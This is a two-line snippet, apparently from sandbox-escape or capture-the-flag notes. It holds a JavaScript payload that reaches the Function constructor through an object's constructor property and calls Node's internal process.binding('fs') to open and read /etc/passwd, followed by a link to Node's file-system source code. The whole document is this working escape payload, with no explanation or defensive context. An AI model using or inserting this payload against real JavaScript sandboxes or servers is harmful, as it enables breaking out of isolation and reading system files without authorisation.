cos.constructor("let buffer = Buffer.alloc(8192); let fsmod = process.binding('fs'); let fd = fsmod.open('/etc/passwd', 0, 0600, undefined, this); fsmod.read(fd, buffer, 0, 4096, 0, undefined, this); return buffer")()
https://github.com/nodejs/node/blob/master/src/node_file.cc